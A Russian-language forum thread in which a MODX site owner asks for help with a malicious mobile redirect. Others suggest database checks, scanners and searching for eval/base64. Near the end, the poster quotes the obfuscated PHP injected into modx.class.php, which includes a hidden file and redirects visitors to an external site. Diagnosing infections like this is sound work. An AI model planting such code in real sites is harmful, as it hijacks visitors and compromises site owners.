Как лечить мобильный редирект на сайте?

Question

[VladimirPortev]

Ребят, привет. Словил мобильный редирект - вирус на сайте. На modx. Проверял на локалке антивирусами - на сервере. Пользовался avast, Aibolit, касперский, NODE32. В логах ничего нет - не пишет, что редиректит. А редиректит так -
сначала на mobile.cook -> 4click -> pohudei.com
Искали по grep - через ssh На совпадение слов (и на base64) - проверили все htacces - проверили все tpl файлы - все там хорошо. Ни совпадений - ничего.
Я подключил мобилу через USB - отладчик - но он не видет этого переброса - он сразу мне в DevTools - открывает последнюю вкладку.
Может кто сталкивался с таким - может по ssh еще что - нибудь я могу поискать.

Comments

[Евгений Вольф]

А как выглядит Ваш мобильный редирект? Иными словами, откуда информация (источник) и как она по факту проявляется?

[VladimirPortev]

Зашли просто с мобилы на сайт - вместо нашего сайта - перекинуло на mobile.cook - потом сразу на 4click - потом на pohudei. и все. При попытке зайти во второй раз на наш сайт - нормально открылся - при заходе через инкогнито - при любой попытке - происходит сразу редирект.

Answer 1

[keslo]

Система MODX Evo?

1. Проверь базу данных: часто там сидит зловред замаскированный под один из сниппетов или плагинов. Обычно он дублирующий основной.
2. Можно прогнать сайт через небольшое дополнение на наличие вредоноса - https://github.com/extras-evolution/evocheck

Comments

[VladimirPortev]

Revo 2.5. Базу я перезалил, у меня бэкап был старый. Не поменялось ничего.

[keslo]

VladimirPortev, по рево точно не подскажу. Попробуйте заменить исходные файлы системы на заведомо безвирусные.

[Владислав Лысков]

есть вероятность что заражен nginx\apache, так же можно в слитых на комп файлах через тотал командер поиска по тексту на наличие eval, base64 , и проанализировать участки кода

[VladimirPortev]

Владислав Лысков, вот я сделал так. искал eval и base64 - много чего нашел. Буду сейчас сидеть проверять. Но хостер вообще сказал, что не обязательно будет в base64

[Владислав Лысков]

VladimirPortev, если движок не трогали, то можно скачать туже самую версию и сравнить с вашим через diff (git)

[Владислав Лысков]

VladimirPortev, дополнил комментарий

[VladimirPortev]

Владислав Лысков, да вот трогали в том то и дело

[VladimirPortev]

Короче нашел я проблему. Вот такая фигня прописалась в файле modx.class.php

<?php $ZGkV9 = $_SERVER["\104\117\103\125\115\105\x4e\x54\x5f\122\x4f\x4f\124"] . "\57\143\x6f\162\x65\57\x6c\145\x78\151\x63\x6f\x6e\57\x65\x6e\57"; include $ZGkV9 . "\x53\x6d\141\x72\164\x79\56\160\x68\160"; Smarty3::redirect("\150\164\164\160\x3a\x2f\x2f\155\157\142\151\154\145\55\x63\x6f\x6f\x6b\x2e\163\x69\x74\x65\x2f\x32\x2f", "\62\x37\65", true, true, $ZGkV9); ?>

Это получается в самое ядро?

Answer 2

[Genrikh]

По моему опыту, virusdie хорошо справляется с поиском вирусов на сайте. Есть возможность проверить бесплатно.